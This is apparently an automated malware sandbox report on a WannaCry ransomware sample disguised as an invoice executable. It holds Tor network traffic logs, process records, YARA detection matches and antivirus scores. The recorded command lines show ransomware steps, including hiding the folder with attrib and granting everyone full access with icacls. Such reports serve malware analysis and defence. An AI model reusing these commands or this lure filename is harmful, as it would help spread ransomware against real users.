                                                          Jan 16, 2024 11:59:49.015486002 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.015520096 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.015553951 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.015563011 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.015568972 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.015611887 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.015615940 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.015619993 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.015665054 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.015687943 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.015696049 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.015877008 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.016380072 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.016402006 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.016410112 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.016452074 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.016452074 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.016468048 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.016477108 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.016495943 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.016510010 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.016539097 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.016568899 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.016573906 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.016608953 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.016611099 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.016611099 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.016628027 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.016690016 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.016699076 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.016705036 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.016707897 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.016746044 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.019820929 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.019828081 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.019834995 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.019880056 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.019898891 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.019917011 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.019936085 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.019943953 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.019978046 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.019992113 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.019992113 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.020041943 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.020055056 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.020131111 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.020138025 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.020143986 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.020152092 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.020179987 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.020179987 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.020205975 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.020272970 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.020272970 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.021554947 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.021588087 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.021627903 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.021668911 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.021682024 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.021682978 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.021709919 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.021714926 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.021718979 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.021727085 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.021755934 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.021841049 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.021847963 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.021858931 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.021866083 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.021893978 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.021893978 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.021934032 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.024910927 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.024940014 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.024983883 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.024991989 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025008917 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.025008917 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.025037050 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.025047064 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025055885 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025062084 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025124073 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.025124073 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.025137901 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025146008 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025152922 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025207043 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.025207043 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025217056 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025279045 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025285959 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025294065 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025321960 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.025321960 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.025336027 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025355101 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025420904 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025433064 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025470018 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.025470018 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.025491953 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025500059 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025544882 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025547981 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.025552988 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025587082 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025613070 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.025619030 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.025669098 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.025669098 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.027333975 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.027374029 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.027398109 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.027434111 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.027460098 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.027467012 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.027503014 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.027503967 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.027510881 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.027523041 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.027535915 CET8049729171.25.193.9192.168.2.16
                                                          Session ID:0
                                                          Source IP:192.168.2.16
                                                          Source Port:49729
                                                          Destination IP:171.25.193.9
                                                          Destination Port:80
                                                          PID:1220
                                                          Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe



                                                          Target ID:0
                                                          Start time:11:58:33
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\System32\rundll32.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                          Imagebase:0x7ff697020000
                                                          File size:71'680 bytes
                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:11:58:50
                                                          Start date:16/01/2024
                                                          Path:C:\Program Files\7-Zip\7zG.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\" -an -ai#7zMap4588:126:7zEvent8780
                                                          Imagebase:0x270000
                                                          File size:700'416 bytes
                                                          MD5 hash:50F289DF0C19484E970849AAC4E6F977
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:11:59:02
                                                          Start date:16/01/2024
                                                          Path:C:\Program Files\7-Zip\7zG.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\" -an -ai#7zMap12385:118:7zEvent28652
                                                          Imagebase:0x270000
                                                          File size:700'416 bytes
                                                          MD5 hash:50F289DF0C19484E970849AAC4E6F977
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:11:59:25
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe"
                                                          Imagebase:0x400000
                                                          File size:3'514'368 bytes
                                                          MD5 hash:84C82835A5D21BBCF75A61706D8AB549
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000000A.00000002.3004531388.000000000040F000.00000004.00000001.01000000.00000006.sdmp, Author: us-cert code analysis team
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000000A.00000003.2298742785.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000000A.00000000.2272165012.000000000040E000.00000008.00000001.01000000.00000006.sdmp, Author: us-cert code analysis team
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Author: Joe Security
                                                          • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Author: Florian Roth (with the help of binar.ly)
                                                          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Author: us-cert code analysis team
                                                          • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Author: ReversingLabs
                                                          Antivirus matches:
                                                          • Detection: 92%, ReversingLabs
                                                          • Detection: 94%, Virustotal
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:11
                                                          Start time:11:59:26
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\SysWOW64\attrib.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:attrib +h .
                                                          Imagebase:0xac0000
                                                          File size:19'456 bytes
                                                          MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:11:59:26
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\SysWOW64\icacls.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:icacls . /grant Everyone:F /T /C /Q
                                                          Imagebase:0x740000
                                                          File size:29'696 bytes
                                                          MD5 hash:2E49585E4E08565F52090B144062F97E
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:13
                                                          Start time:11:59:26
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7ecdf0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:11:59:26
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7ecdf0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:16
                                                          Start time:11:59:26
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 89%, ReversingLabs
                                                          • Detection: 88%, Virustotal
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:17
                                                          Start time:11:59:27
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\system32\cmd.exe /c 118491705402797.bat
                                                          Imagebase:0x960000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:18
                                                          Start time:11:59:27
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7ecdf0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:19
                                                          Start time:11:59:27
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:20
                                                          Start time:11:59:27
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\SysWOW64\cscript.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cscript.exe //nologo m.vbs
                                                          Imagebase:0x50000
                                                          File size:144'896 bytes
                                                          MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:21
                                                          Start time:11:59:27
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:22
                                                          Start time:11:59:27
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:23
                                                          Start time:11:59:28
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:24
                                                          Start time:11:59:28
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:25
                                                          Start time:11:59:28
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:26
                                                          Start time:11:59:29
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:27
                                                          Start time:11:59:29
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:28
                                                          Start time:11:59:29
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:29
                                                          Start time:11:59:30
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:30
                                                          Start time:11:59:30
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:31
                                                          Start time:11:59:30
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:32
                                                          Start time:11:59:30
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:33
                                                          Start time:11:59:31
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:34
                                                          Start time:11:59:31
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:35
                                                          Start time:11:59:31
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:36
                                                          Start time:11:59:31
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:37
                                                          Start time:11:59:32
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:38
                                                          Start time:11:59:32
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:39
                                                          Start time:11:59:32
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:40
                                                          Start time:11:59:33
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:41
                                                          Start time:11:59:33
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:42
                                                          Start time:11:59:33
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:43
                                                          Start time:11:59:33
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:44
                                                          Start time:11:59:34
                                                          Start date:16/01/2024
